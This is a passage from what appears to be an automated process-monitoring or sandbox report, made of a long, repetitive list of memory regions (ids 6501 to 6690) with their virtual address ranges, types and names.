"pagefile_0x0000000000610000" filename = "" Region: id = 6501 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6502 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6503 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6504 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6505 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6506 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6507 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6508 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6509 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6510 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6511 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6512 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6513 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6514 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6515 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6516 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6517 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6518 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6519 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6520 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6521 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6522 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6523 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6524 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6525 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6526 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6527 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6528 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6529 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6530 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6531 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6532 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6533 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6534 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6535 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6536 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6537 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6538 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6539 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6540 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6541 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6542 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6543 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6544 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6545 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6546 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6547 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6548 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6549 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6550 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6551 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6552 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6553 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6554 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6555 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6556 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6557 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6558 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6559 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6560 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6561 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6562 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6563 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6564 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6565 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6566 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6567 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6568 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6569 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6570 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6571 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6572 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6573 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6574 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6575 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6576 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6577 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6578 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6579 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6580 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6581 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6582 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6583 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6584 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6585 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6586 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6587 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6588 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6589 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6590 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6591 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6592 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6593 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6594 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6595 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6596 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6597 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6598 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6599 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6600 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6601 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6602 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6603 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6604 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6605 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6606 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6607 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6608 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6609 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6610 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6611 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6612 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6613 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6614 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6615 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6616 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6617 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6618 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6619 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6620 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6621 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6622 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6623 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6624 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6625 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6626 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6627 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6628 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6629 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6630 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6631 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6632 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6633 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6634 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6635 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6636 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6637 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6638 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6639 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6640 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6641 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6642 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6643 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6644 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6645 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6646 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6647 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6648 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6649 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6650 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6651 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6652 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6653 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6654 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6655 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6656 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6657 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6658 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6659 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6660 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6661 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6662 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6663 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6664 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6665 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6666 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6667 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6668 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6669 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6670 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6671 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6672 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6673 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6674 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6675 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6676 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6677 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6678 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6679 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6680 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6681 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6682 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6683 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6684 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6685 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6686 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6687 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6688 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6689 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6690 start_va = 0x610000 end_va = 0x61efff monitored = 1 